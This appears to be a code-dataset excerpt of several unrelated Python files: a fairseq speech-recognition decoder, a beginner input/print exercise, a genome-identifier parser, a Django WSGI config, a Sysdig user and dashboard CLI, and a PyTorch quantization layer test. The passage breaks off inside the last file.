trn = ''.join(result.label_sequences[0][0]).replace('|', ' ')
trn_fileobj.write(f'{trn} ({id})\n')
txt_fileobj.write(f'{id} {trn}\n')
_LG.info('%d/%d: %s: %s', i, len(audios), id, trn)
num_frames += waveform.size(1)
t_enc += t1 - t0
t_dec += t2 - t1
t_audio = num_frames / 16000
_LG.info('Audio duration: %s [sec]', t_audio)
_LG.info('Encoding Time: %s [sec]', t_enc)
_LG.info('Decoding Time: %s [sec]', t_dec)
_LG.info('Total Inference Time: %s [sec]', t_enc + t_dec)
def _main():
args = _parse_args()
torch.set_num_threads(args.num_threads)
logging.basicConfig(
format='%(asctime)s %(levelname)s: %(message)s',
level=logging.INFO)
audios = _parse_transcriptions(args.root_dir, args.output_dir)
encoder, decoder = _load_model(args.model_file, args.dict_file)
_decode(audios, encoder, decoder, args.output_dir)
if __name__ == '__main__':
_main()
| 29.127168 | 82 | 0.60647 |
import os
import time
import logging
import argparse
from pathlib import Path
import torch
import torchaudio
import fairseq
import simple_ctc
_LG = logging.getLogger(__name__)
def _parse_args():
def _path(path):
return Path(os.path.normpath(path))
parser = argparse.ArgumentParser(
description=__doc__,
)
parser.add_argument(
'--root-dir',
required=True,
type=_path,
help='The root directory on which data are persed.'
)
parser.add_argument(
'--output-dir',
required=True,
type=_path,
help='The output directory where trn files are generated.'
)
parser.add_argument(
'--model-file',
required=True,
type=_path,
help='Path to a finetuned weight file.'
)
parser.add_argument(
'--dict-file',
required=True,
type=_path,
help='Path to `dict.ltr.txt` file.'
)
parser.add_argument(
'--num-threads',
type=int,
default=4,
help='Maximum number of threads .'
)
args = parser.parse_args()
for path in [args.root_dir, args.output_dir, args.model_file, args.dict_file]:
if not os.path.exists(path):
raise RuntimeError(f'File or directory does not exist: {path}')
return args
def _parse_transcript(path):
with open(path) as trans_fileobj:
for line in trans_fileobj:
line = line.strip()
if not line:
continue
id, transcription = line.split(' ', maxsplit=1)
yield id, transcription
def _parse_transcriptions(root_dir, output_dir):
_LG.info('Parsing transcriptions')
audios = []
trn = output_dir / 'ref.trn'
txt = output_dir / 'ref.trans.txt'
with open(trn, 'w') as trn_fileobj, open(txt, 'w') as txt_fileobj:
for trans_file in root_dir.glob('**/*.trans.txt'):
trans_dir = trans_file.parent
for id, transcription in _parse_transcript(trans_file):
trn_fileobj.write(f'{transcription} ({id})\n')
txt_fileobj.write(f'{id} {transcription}\n')
audio_path = trans_dir / f'{id}.flac'
audios.append((id, audio_path))
return audios
def _load_vocab(dict_file):
tokens = ["<s>", "<pad>", "</s>", "<unk>"]
with open(dict_file, mode='r', encoding='utf-8') as fileobj:
for line in fileobj:
tokens.append(line.split()[0])
return tokens
def _count_params(model):
return sum(p.numel() for p in model.parameters())
def _load_model(model_file, dict_file):
_LG.info('Loading the model')
labels = _load_vocab(dict_file)
overrides = {'data': str(dict_file.parent)}
models, _, _ = fairseq.checkpoint_utils.load_model_ensemble_and_task(
[str(model_file)], arg_overrides=overrides
)
model = models[0].eval()
encoder = model.w2v_encoder
decoder = simple_ctc.BeamSearchDecoder(
labels,
cutoff_top_n=40,
cutoff_prob=0.8,
beam_size=100,
num_processes=1,
blank_id=0,
is_nll=True,
)
_LG.info('#parameters: %s', _count_params(encoder))
return encoder, decoder
def _decode(audios, encoder, decoder, output_dir):
trn = output_dir / 'hyp.trn'
trans = output_dir / 'hyp.trans.txt'
t_enc, t_dec, num_frames = 0.0, 0.0, 0
with open(trn, 'w') as trn_fileobj, open(trans, 'w') as txt_fileobj:
for i, (id, path) in enumerate(audios):
waveform, _ = torchaudio.load(path)
mask = torch.zeros_like(waveform)
t0 = time.monotonic()
ir = encoder(waveform, mask)['encoder_out'].transpose(1, 0)
t1 = time.monotonic()
result = decoder.decode(ir)
t2 = time.monotonic()
trn = ''.join(result.label_sequences[0][0]).replace('|', ' ')
trn_fileobj.write(f'{trn} ({id})\n')
txt_fileobj.write(f'{id} {trn}\n')
_LG.info('%d/%d: %s: %s', i, len(audios), id, trn)
num_frames += waveform.size(1)
t_enc += t1 - t0
t_dec += t2 - t1
t_audio = num_frames / 16000
_LG.info('Audio duration: %s [sec]', t_audio)
_LG.info('Encoding Time: %s [sec]', t_enc)
_LG.info('Decoding Time: %s [sec]', t_dec)
_LG.info('Total Inference Time: %s [sec]', t_enc + t_dec)
def _main():
args = _parse_args()
torch.set_num_threads(args.num_threads)
logging.basicConfig(
format='%(asctime)s %(levelname)s: %(message)s',
level=logging.INFO)
audios = _parse_transcriptions(args.root_dir, args.output_dir)
encoder, decoder = _load_model(args.model_file, args.dict_file)
_decode(audios, encoder, decoder, args.output_dir)
if __name__ == '__main__':
_main()
| true | true |
f722ed2d78ffd31704a3828c381652fbd174ab85 | 1,115 | py | Python | curso_em_video/mundo_1/exs_python/ExPy002.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | 1 | 2020-09-19T21:39:12.000Z | 2020-09-19T21:39:12.000Z | curso_em_video/mundo_1/exs_python/ExPy002.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | null | null | null | curso_em_video/mundo_1/exs_python/ExPy002.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | null | null | null | n = str(input('Digite o nome: '))
#Função input(): tem por objetivo de escrever a String passada como parâmetro e em seguida, ativar o modo de digitação, isto é, colocar o Console de uma determinada forma em que seja possível a digitação (entrada de dados).
#faz uma pausa no programa e espera uma entrada do usuário pelo terminal. Para ler a entrada do usuário a função input() espera que após digitada a entrada o usuário aperte a tecla enter, após isso input() lê essa entrada como uma string, portanto, se a entrada esperada for um número ela deve ser convertida usando-se as funções de conversão int() ou float().
print(f'É um prazer te conhecer, {n}')
#String literal formatada: comece uma string com f ou F, antes de abrir as aspas ou aspas triplas. Dentro dessa string, pode-se escrever uma expressão Python entre caracteres { e }, que podem se referir a variáveis, ou valores literais.
print('É um prazer te conhecer, ', n)
print('Olá {0}, é um prazer te conhecer.'.format(n))
#Método format(): serve para criar uma string que contem campos entre chaves a serem substituídos pelos argumentos de format.
| 92.916667 | 360 | 0.765022 | n = str(input('Digite o nome: '))
print(f'É um prazer te conhecer, {n}')
print('É um prazer te conhecer, ', n)
print('Olá {0}, é um prazer te conhecer.'.format(n))
| true | true |
f722ed95d6a5994ae42bdd8b4cd697faea3865f3 | 1,415 | py | Python | tools/eupath/Tools/lib/python/eupath/ReferenceGenome.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | 1 | 2021-02-05T13:19:58.000Z | 2021-02-05T13:19:58.000Z | tools/eupath/Tools/lib/python/eupath/ReferenceGenome.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | null | null | null | tools/eupath/Tools/lib/python/eupath/ReferenceGenome.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | null | null | null | #!/usr/bin/python
import EupathExporter
import re
class Genome:
def __init__(self, reference_genome):
"""
Teases out from the user's parameter, the reference genome information used in the construction of dependency
data. The reference genome parameter should be of the form: ProjectId-EupathBuildNumber_Strain_Genome
:param reference_genome: the reference genome parameter provided by the user
"""
# Insure the the reference genome matches the pattern for Eupath originated reference genomes.
if not reference_genome and not re.match(r'^.+-\d+_.+_Genome$', reference_genome, flags=0):
raise EupathExporter.ValidationException(
"A syntactically correct reference genome is required for exports to EuPathDB.")
self._identifier = reference_genome
self._project = reference_genome[0:reference_genome.index("-")]
sans_project = reference_genome[reference_genome.index("-") + 1:]
components = sans_project.split("_")
self._version = components[0]
self._display_name = components[1] + " Genome"
@property
def project(self):
return self._project
@property
def version(self):
return self._version
@property
def display_name(self):
return self._display_name
@property
def identifier(self):
return self._identifier
| 33.690476 | 117 | 0.684099 |
import EupathExporter
import re
class Genome:
def __init__(self, reference_genome):
if not reference_genome and not re.match(r'^.+-\d+_.+_Genome$', reference_genome, flags=0):
raise EupathExporter.ValidationException(
"A syntactically correct reference genome is required for exports to EuPathDB.")
self._identifier = reference_genome
self._project = reference_genome[0:reference_genome.index("-")]
sans_project = reference_genome[reference_genome.index("-") + 1:]
components = sans_project.split("_")
self._version = components[0]
self._display_name = components[1] + " Genome"
@property
def project(self):
return self._project
@property
def version(self):
return self._version
@property
def display_name(self):
return self._display_name
@property
def identifier(self):
return self._identifier
| true | true |
f722ed960abdb9688a7e575da1d14c2e74549e98 | 385 | py | Python | wsgi.py | mustafa-kamel/pytextmatch | 8a9d178b9dffa69e7be29c98c7f94cf4c5018cdd | [
"MIT"
] | null | null | null | wsgi.py | mustafa-kamel/pytextmatch | 8a9d178b9dffa69e7be29c98c7f94cf4c5018cdd | [
"MIT"
] | null | null | null | wsgi.py | mustafa-kamel/pytextmatch | 8a9d178b9dffa69e7be29c98c7f94cf4c5018cdd | [
"MIT"
] | null | null | null | """
WSGI config for textmatch project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')
application = get_wsgi_application()
| 22.647059 | 78 | 0.784416 |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')
application = get_wsgi_application()
| true | true |
f722ee31358c95a53a0ac7b0f86edf625ad85670 | 3,490 | py | Python | cli/create.py | sysdiglabs/syscli | f72f476f7b555ce8be4d1b6d6ce21c53400aeb08 | [
"Apache-2.0"
] | null | null | null | cli/create.py | sysdiglabs/syscli | f72f476f7b555ce8be4d1b6d6ce21c53400aeb08 | [
"Apache-2.0"
] | 3 | 2019-01-30T12:32:13.000Z | 2019-01-30T12:37:38.000Z | cli/create.py | sysdiglabs/syscli | f72f476f7b555ce8be4d1b6d6ce21c53400aeb08 | [
"Apache-2.0"
] | 2 | 2019-01-21T11:05:09.000Z | 2021-04-19T21:57:57.000Z | # Copyright 2018 Sysdig
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sdc.sdc_config import load_config_env
from sdc.sdc_enums import EXIT_CODES
from sdc.sdc_extend import SdMonitorClient
from sdc.sdc_method_create import create_user, create_dashboards_from_file
from . import subparser
import os.path
def create(args):
_create_parser.print_help()
exit(1)
def user(args):
config = load_config_env(args.file, args.env)
if config["token"] is None or config["token"] == "":
raise Exception("Token not provided, cannot create a user")
sdmonitor = SdMonitorClient(config["token"], config["url"])
res = create_user(sdmonitor, email=args.email, first_name=args.first_name, last_name=args.last_name,
system_role=args.system_role)
if res == EXIT_CODES.OK:
print(f"Created user {args.email}")
else:
print(f"There has been an error creating the user")
def dashboards(args):
config = load_config_env(args.file, args.env)
if config["token"] is None or config["token"] == "":
raise Exception("Token not provided, cannot create a user")
sdmonitor = SdMonitorClient(config["token"], config["url"])
if not os.path.isfile(args.input_file):
raise Exception(f"File {args.input_file} does not exist or is not a file.")
with open(args.input_file, "r") as file:
res = create_dashboards_from_file(sdmonitor, file)
if res == EXIT_CODES.OK:
print("Dashboards created")
else:
print("Error creating dashboards")
_create_parser = subparser.add_parser("create", description="Creates users, teams, groups, etc. ")
_create_subparser = _create_parser.add_subparsers(dest="create")
_create_parser.set_defaults(func=create)
# User
_user_parser = _create_subparser.add_parser("user", description="Creates an invitation to the user with desired "
"information")
_user_parser.add_argument("email", help="The email address of the user that will be invited to use Sysdig Monitor"),
_user_parser.add_argument("first_name", help="The first name of the user being invited"),
_user_parser.add_argument("last_name", help="The last name of the user being invited"),
_user_parser.add_argument("system_role", default="ROLE_USER", nargs="?",
help="System-wide privilege level for this user regardless of team. specify 'ROLE_CUSTOMER' "
"to create an Admin. If not specified, default is a non-Admin ('ROLE_USER').")
_user_parser.set_defaults(func=user)
# Dashboards
_dashboard_parser = _create_subparser.add_parser("dashboards", description="Creates dashboards in Sysdig Monitor")
_dashboard_parser.add_argument("-i", dest="input_file", required=True,
help="Input file with all the dashboards information as retrieved by the 'get' method")
_dashboard_parser.set_defaults(func=dashboards)
| 43.625 | 119 | 0.704298 |
from sdc.sdc_config import load_config_env
from sdc.sdc_enums import EXIT_CODES
from sdc.sdc_extend import SdMonitorClient
from sdc.sdc_method_create import create_user, create_dashboards_from_file
from . import subparser
import os.path
def create(args):
_create_parser.print_help()
exit(1)
def user(args):
config = load_config_env(args.file, args.env)
if config["token"] is None or config["token"] == "":
raise Exception("Token not provided, cannot create a user")
sdmonitor = SdMonitorClient(config["token"], config["url"])
res = create_user(sdmonitor, email=args.email, first_name=args.first_name, last_name=args.last_name,
system_role=args.system_role)
if res == EXIT_CODES.OK:
print(f"Created user {args.email}")
else:
print(f"There has been an error creating the user")
def dashboards(args):
config = load_config_env(args.file, args.env)
if config["token"] is None or config["token"] == "":
raise Exception("Token not provided, cannot create a user")
sdmonitor = SdMonitorClient(config["token"], config["url"])
if not os.path.isfile(args.input_file):
raise Exception(f"File {args.input_file} does not exist or is not a file.")
with open(args.input_file, "r") as file:
res = create_dashboards_from_file(sdmonitor, file)
if res == EXIT_CODES.OK:
print("Dashboards created")
else:
print("Error creating dashboards")
_create_parser = subparser.add_parser("create", description="Creates users, teams, groups, etc. ")
_create_subparser = _create_parser.add_subparsers(dest="create")
_create_parser.set_defaults(func=create)
_user_parser = _create_subparser.add_parser("user", description="Creates an invitation to the user with desired "
"information")
_user_parser.add_argument("email", help="The email address of the user that will be invited to use Sysdig Monitor"),
_user_parser.add_argument("first_name", help="The first name of the user being invited"),
_user_parser.add_argument("last_name", help="The last name of the user being invited"),
_user_parser.add_argument("system_role", default="ROLE_USER", nargs="?",
help="System-wide privilege level for this user regardless of team. specify 'ROLE_CUSTOMER' "
"to create an Admin. If not specified, default is a non-Admin ('ROLE_USER').")
_user_parser.set_defaults(func=user)
_dashboard_parser = _create_subparser.add_parser("dashboards", description="Creates dashboards in Sysdig Monitor")
_dashboard_parser.add_argument("-i", dest="input_file", required=True,
help="Input file with all the dashboards information as retrieved by the 'get' method")
_dashboard_parser.set_defaults(func=dashboards)
| true | true |
f722ef46ee79e182bd48be96631c6cc9b7d93c9c | 11,666 | py | Python | tests/pytorch_tests/layer_tests/base_pytorch_layer_test.py | reuvenperetz/model_optimization | 40de02d56750ee4cc20e693da63bc2e70b4d20e6 | [
"Apache-2.0"
] | null | null | null | tests/pytorch_tests/layer_tests/base_pytorch_layer_test.py | reuvenperetz/model_optimization | 40de02d56750ee4cc20e693da63bc2e70b4d20e6 | [
"Apache-2.0"
] | null | null | null | tests/pytorch_tests/layer_tests/base_pytorch_layer_test.py | reuvenperetz/model_optimization | 40de02d56750ee4cc20e693da63bc2e70b4d20e6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import operator
from typing import List, Any, Tuple
import numpy as np
import torch
from torch.nn import Hardswish, Hardsigmoid, ReLU, Hardtanh, ReLU6, LeakyReLU, PReLU, SiLU, Softmax, \
Sigmoid, Softplus, Softsign, Tanh
from torch.nn.functional import hardswish, hardsigmoid, relu, hardtanh, relu6, leaky_relu, prelu, silu, softmax, \
softplus, softsign
from torch.nn import UpsamplingBilinear2d, AdaptiveAvgPool2d, AvgPool2d, MaxPool2d
from torch.nn.functional import upsample_bilinear, adaptive_avg_pool2d, avg_pool2d, max_pool2d
from torch.nn import Conv2d, ConvTranspose2d, Linear, BatchNorm2d
from torch.nn import Dropout, Flatten
from torch import add, multiply, mul, sub, flatten, reshape, split, unsqueeze, concat, cat,\
mean, dropout, sigmoid, tanh
from torch.fx import symbolic_trace
from torch.nn import Module
from model_compression_toolkit import FrameworkInfo, pytorch_post_training_quantization
from model_compression_toolkit.core.common.framework_implementation import FrameworkImplementation
from model_compression_toolkit.core.tpc_models.default_tp_model import get_default_tp_model
from model_compression_toolkit.core.tpc_models.pytorch_tp_models.pytorch_default import generate_pytorch_tpc
from model_compression_toolkit.core.pytorch.constants import CALL_FUNCTION, OUTPUT, CALL_METHOD, PLACEHOLDER
from model_compression_toolkit.core.pytorch.reader.graph_builders import DummyPlaceHolder, ConstantHolder
from model_compression_toolkit.core.pytorch.utils import torch_tensor_to_numpy, to_torch_tensor
from tests.common_tests.base_layer_test import BaseLayerTest, LayerTestMode
from model_compression_toolkit.core.pytorch.default_framework_info import DEFAULT_PYTORCH_INFO
from model_compression_toolkit.core.pytorch.pytorch_implementation import PytorchImplementation
from tests.common_tests.helpers.generate_test_tp_model import generate_test_tp_model
PYTORCH_LAYER_TEST_OPS = {
"kernel_ops": [Conv2d, Linear, ConvTranspose2d],
"no_quantization": [Dropout, Flatten, ConstantHolder, dropout, flatten, split, operator.getitem, reshape,
unsqueeze],
"activation": [DummyPlaceHolder,
Hardswish, Hardsigmoid, ReLU, Hardtanh, ReLU6, LeakyReLU, PReLU, SiLU, Softmax,
Sigmoid, Softplus, Softsign, Tanh, hardswish, hardsigmoid, relu, hardtanh,
relu6, leaky_relu, prelu,
silu, softmax, sigmoid, softplus, softsign, tanh, torch.relu,
UpsamplingBilinear2d, AdaptiveAvgPool2d, AvgPool2d, MaxPool2d,
upsample_bilinear, adaptive_avg_pool2d, avg_pool2d, max_pool2d,
add, sub, mul, multiply,
operator.add, operator.sub, operator.mul,
BatchNorm2d, concat, cat, mean]
}
class LayerTestModel(torch.nn.Module):
def __init__(self, layer):
super(LayerTestModel, self).__init__()
self.layer = layer
def forward(self, x):
return self.layer(x)
class OperationTestModel(torch.nn.Module):
def __init__(self, layer):
super(OperationTestModel, self).__init__()
self.layer = layer
def forward(self, x, y):
return self.layer(x, y)
def is_node_fake_quant(node):
return node.target == torch.fake_quantize_per_tensor_affine
def get_node_operation(node, model):
if hasattr(model, str(node.target)):
op = getattr(model, node.target)
elif node.op == CALL_FUNCTION:
op = node.target
elif node.op == CALL_METHOD:
op = getattr(torch, node.target)
elif node.op == PLACEHOLDER:
op = DummyPlaceHolder
elif node.op == OUTPUT:
op = OUTPUT
else:
op = None
return op
def get_layer_weights(layer):
# extract layer weights and named buffers
weights = {}
named_parameters_weights = {name: torch_tensor_to_numpy(parameter) for name, parameter in
layer.named_parameters()}
named_buffer_weights = {name: torch_tensor_to_numpy(parameter) for name, parameter in
layer.named_buffers() if len(parameter.shape) > 0}
weights.update(named_parameters_weights)
weights.update(named_buffer_weights)
return weights
class BasePytorchLayerTest(BaseLayerTest):
def __init__(self,
unit_test,
layers: List[Any],
val_batch_size: int = 1,
num_calibration_iter: int = 1,
num_of_inputs: int = 1,
input_shape: Tuple[int, int, int] = (3, 8, 8),
quantization_modes: List[LayerTestMode] = [LayerTestMode.FLOAT, LayerTestMode.QUANTIZED_8_BITS],
is_inputs_a_list: bool = False,
use_cpu: bool = False):
super().__init__(unit_test=unit_test,
layers=layers,
val_batch_size=val_batch_size,
num_calibration_iter=num_calibration_iter,
num_of_inputs=num_of_inputs,
input_shape=input_shape,
quantization_modes=quantization_modes,
is_inputs_a_list=is_inputs_a_list,
use_cpu=use_cpu)
def get_tpc(self):
if self.current_mode == LayerTestMode.FLOAT:
# Disable all features that are enabled by default:
tp = generate_test_tp_model({'enable_weights_quantization': False,
'enable_activation_quantization': False})
return generate_pytorch_tpc(name="base_layer_test", tp_model=tp)
elif self.current_mode == LayerTestMode.QUANTIZED_8_BITS:
tp = generate_test_tp_model({'weights_n_bits': 8,
'activation_n_bits': 8})
return generate_pytorch_tpc(name="8bit_layer_test", tp_model=tp)
else:
raise NotImplemented
def get_fw_info(self) -> FrameworkInfo:
return DEFAULT_PYTORCH_INFO
def get_fw_impl(self) -> FrameworkImplementation:
return PytorchImplementation()
def get_ptq_facade(self):
return pytorch_post_training_quantization
def generate_inputs(self):
return to_torch_tensor([torch.randn(*in_shape) for in_shape in self.get_input_shapes()])
def create_networks(self):
models = []
for layer in self.get_layers():
if self.num_of_inputs > 1:
models.append(OperationTestModel(layer))
else:
models.append(LayerTestModel(layer))
return models
def compare(self, quantized_model: Module, float_model: Module, input_x=None, quantization_info=None):
quantized_model_fx = symbolic_trace(quantized_model)
# Assert things that should happen when using FLOAT quantization mode
if self.current_mode == LayerTestMode.FLOAT:
self.__compare_float_mode(float_model, quantized_model, quantized_model_fx)
# Assert things that should happen when using QUANTIZED_8_BITS quantization mode
elif self.current_mode == LayerTestMode.QUANTIZED_8_BITS:
self.__compare_8bits_quantization_mode(float_model, quantized_model, quantized_model_fx)
# Check inference is possible
input_tensors = self.generate_inputs()
quantized_model(*input_tensors)
quantized_model_fx(*input_tensors)
def __compare_8bits_quantization_mode(self, float_model, quantized_model, quantized_model_fx):
fw_info = self.get_fw_info()
for node in quantized_model_fx.graph.nodes:
op = get_node_operation(node, quantized_model)
if op == OUTPUT or op == operator.getitem or is_node_fake_quant(node):
continue
if hasattr(quantized_model, str(node.target)):
if type(op) in PYTORCH_LAYER_TEST_OPS['kernel_ops']:
quantized_weights = get_layer_weights(getattr(quantized_model, node.target))
float_weights = get_layer_weights(getattr(float_model, node.target))
for k, v in quantized_weights.items():
if k in fw_info.kernel_ops_attributes_mapping.get(type(op)):
float_weight = float_weights.get(k)
self.unit_test.assertFalse(float_weight is None)
self.unit_test.assertTrue(np.sum(np.abs(v - float_weight)) > 0.0)
node_next = node.next
while get_node_operation(node_next, quantized_model) == operator.getitem:
node_next = node_next.next
self.unit_test.assertTrue(is_node_fake_quant(node_next))
elif op in PYTORCH_LAYER_TEST_OPS['activation']:
node_next = node.next
while get_node_operation(node_next, quantized_model) == operator.getitem:
node_next = node_next.next
self.unit_test.assertTrue(is_node_fake_quant(node_next))
elif op in PYTORCH_LAYER_TEST_OPS['no_quantization']:
node_next = node.next
while get_node_operation(node_next, quantized_model) == operator.getitem:
node_next = node_next.next
self.unit_test.assertFalse(is_node_fake_quant(node_next))
else:
raise Exception(f'Layer {op} is not in framework info')
def __compare_float_mode(self, float_model, quantized_model, quantized_model_fx):
for node in quantized_model_fx.graph.nodes:
# Check there are no fake-quant layers
self.unit_test.assertFalse(is_node_fake_quant(node))
# check unchanged weights
if hasattr(quantized_model, str(node.target)):
quantized_weights = get_layer_weights(getattr(quantized_model, node.name))
float_weights = get_layer_weights(getattr(float_model, node.name))
for k, v in quantized_weights.items():
float_weight = float_weights.get(k)
self.unit_test.assertFalse(float_weight is None)
self.unit_test.assertTrue(np.sum(np.abs(v - float_weight)) == 0.0)
input_tensors = self.generate_inputs()
y = float_model(*input_tensors)
y_hat = quantized_model(*input_tensors)
if isinstance(y, (list, tuple)):
for fo, qo in zip(y, y_hat):
distance = torch_tensor_to_numpy(torch.sum(torch.abs(fo - qo)))
self.unit_test.assertTrue(distance == 0,
msg=f'Outputs should be identical. Observed distance: {distance}')
else:
distance = torch_tensor_to_numpy(torch.sum(torch.abs(y - y_hat)))
self.unit_test.assertTrue(distance == 0,
msg=f'Outputs should be identical. Observed distance: {distance}')
| 47.616327 | 114 | 0.661924 |
import operator
from typing import List, Any, Tuple
import numpy as np
import torch
from torch.nn import Hardswish, Hardsigmoid, ReLU, Hardtanh, ReLU6, LeakyReLU, PReLU, SiLU, Softmax, \
Sigmoid, Softplus, Softsign, Tanh
from torch.nn.functional import hardswish, hardsigmoid, relu, hardtanh, relu6, leaky_relu, prelu, silu, softmax, \
softplus, softsign
from torch.nn import UpsamplingBilinear2d, AdaptiveAvgPool2d, AvgPool2d, MaxPool2d
from torch.nn.functional import upsample_bilinear, adaptive_avg_pool2d, avg_pool2d, max_pool2d
from torch.nn import Conv2d, ConvTranspose2d, Linear, BatchNorm2d
from torch.nn import Dropout, Flatten
from torch import add, multiply, mul, sub, flatten, reshape, split, unsqueeze, concat, cat,\
mean, dropout, sigmoid, tanh
from torch.fx import symbolic_trace
from torch.nn import Module
from model_compression_toolkit import FrameworkInfo, pytorch_post_training_quantization
from model_compression_toolkit.core.common.framework_implementation import FrameworkImplementation
from model_compression_toolkit.core.tpc_models.default_tp_model import get_default_tp_model
from model_compression_toolkit.core.tpc_models.pytorch_tp_models.pytorch_default import generate_pytorch_tpc
from model_compression_toolkit.core.pytorch.constants import CALL_FUNCTION, OUTPUT, CALL_METHOD, PLACEHOLDER
from model_compression_toolkit.core.pytorch.reader.graph_builders import DummyPlaceHolder, ConstantHolder
from model_compression_toolkit.core.pytorch.utils import torch_tensor_to_numpy, to_torch_tensor
from tests.common_tests.base_layer_test import BaseLayerTest, LayerTestMode
from model_compression_toolkit.core.pytorch.default_framework_info import DEFAULT_PYTORCH_INFO
from model_compression_toolkit.core.pytorch.pytorch_implementation import PytorchImplementation
from tests.common_tests.helpers.generate_test_tp_model import generate_test_tp_model
PYTORCH_LAYER_TEST_OPS = {
"kernel_ops": [Conv2d, Linear, ConvTranspose2d],
"no_quantization": [Dropout, Flatten, ConstantHolder, dropout, flatten, split, operator.getitem, reshape,
unsqueeze],
"activation": [DummyPlaceHolder,
Hardswish, Hardsigmoid, ReLU, Hardtanh, ReLU6, LeakyReLU, PReLU, SiLU, Softmax,
Sigmoid, Softplus, Softsign, Tanh, hardswish, hardsigmoid, relu, hardtanh,
relu6, leaky_relu, prelu,
silu, softmax, sigmoid, softplus, softsign, tanh, torch.relu,
UpsamplingBilinear2d, AdaptiveAvgPool2d, AvgPool2d, MaxPool2d,
upsample_bilinear, adaptive_avg_pool2d, avg_pool2d, max_pool2d,
add, sub, mul, multiply,
operator.add, operator.sub, operator.mul,
BatchNorm2d, concat, cat, mean]
}
class LayerTestModel(torch.nn.Module):
def __init__(self, layer):
super(LayerTestModel, self).__init__()
self.layer = layer
def forward(self, x):
return self.layer(x)
class OperationTestModel(torch.nn.Module):
def __init__(self, layer):
super(OperationTestModel, self).__init__()
self.layer = layer
def forward(self, x, y):
return self.layer(x, y)
def is_node_fake_quant(node):
return node.target == torch.fake_quantize_per_tensor_affine
def get_node_operation(node, model):
if hasattr(model, str(node.target)):
op = getattr(model, node.target)
elif node.op == CALL_FUNCTION:
op = node.target
elif node.op == CALL_METHOD:
op = getattr(torch, node.target)
elif node.op == PLACEHOLDER:
op = DummyPlaceHolder
elif node.op == OUTPUT:
op = OUTPUT
else:
op = None
return op
def get_layer_weights(layer):
weights = {}
named_parameters_weights = {name: torch_tensor_to_numpy(parameter) for name, parameter in
layer.named_parameters()}
named_buffer_weights = {name: torch_tensor_to_numpy(parameter) for name, parameter in
layer.named_buffers() if len(parameter.shape) > 0}
weights.update(named_parameters_weights)
weights.update(named_buffer_weights)
return weights
class BasePytorchLayerTest(BaseLayerTest):
def __init__(self,
unit_test,
layers: List[Any],
val_batch_size: int = 1,
num_calibration_iter: int = 1,
num_of_inputs: int = 1,
input_shape: Tuple[int, int, int] = (3, 8, 8),
quantization_modes: List[LayerTestMode] = [LayerTestMode.FLOAT, LayerTestMode.QUANTIZED_8_BITS],
is_inputs_a_list: bool = False,
use_cpu: bool = False):
super().__init__(unit_test=unit_test,
layers=layers,
val_batch_size=val_batch_size,
num_calibration_iter=num_calibration_iter,
num_of_inputs=num_of_inputs,
input_shape=input_shape,
quantization_modes=quantization_modes,
is_inputs_a_list=is_inputs_a_list,
use_cpu=use_cpu)
def get_tpc(self):
if self.current_mode == LayerTestMode.FLOAT:
tp = generate_test_tp_model({'enable_weights_quantization': False,
'enable_activation_quantization': False})
return generate_pytorch_tpc(name="base_layer_test", tp_model=tp)
elif self.current_mode == LayerTestMode.QUANTIZED_8_BITS:
tp = generate_test_tp_model({'weights_n_bits': 8,
'activation_n_bits': 8})
return generate_pytorch_tpc(name="8bit_layer_test", tp_model=tp)
else:
raise NotImplemented
def get_fw_info(self) -> FrameworkInfo:
return DEFAULT_PYTORCH_INFO
def get_fw_impl(self) -> FrameworkImplementation:
return PytorchImplementation()
def get_ptq_facade(self):
return pytorch_post_training_quantization
def generate_inputs(self):
return to_torch_tensor([torch.randn(*in_shape) for in_shape in self.get_input_shapes()])
def create_networks(self):
models = []
for layer in self.get_layers():
if self.num_of_inputs > 1:
models.append(OperationTestModel(layer))
else:
models.append(LayerTestModel(layer))
return models
def compare(self, quantized_model: Module, float_model: Module, input_x=None, quantization_info=None):
quantized_model_fx = symbolic_trace(quantized_model)
if self.current_mode == LayerTestMode.FLOAT:
self.__compare_float_mode(float_model, quantized_model, quantized_model_fx)
elif self.current_mode == LayerTestMode.QUANTIZED_8_BITS:
self.__compare_8bits_quantization_mode(float_model, quantized_model, quantized_model_fx)
input_tensors = self.generate_inputs()
quantized_model(*input_tensors)
quantized_model_fx(*input_tensors)
def __compare_8bits_quantization_mode(self, float_model, quantized_model, quantized_model_fx):
fw_info = self.get_fw_info()
for node in quantized_model_fx.graph.nodes:
op = get_node_operation(node, quantized_model)
if op == OUTPUT or op == operator.getitem or is_node_fake_quant(node):
continue
if hasattr(quantized_model, str(node.target)):
if type(op) in PYTORCH_LAYER_TEST_OPS['kernel_ops']:
quantized_weights = get_layer_weights(getattr(quantized_model, node.target))
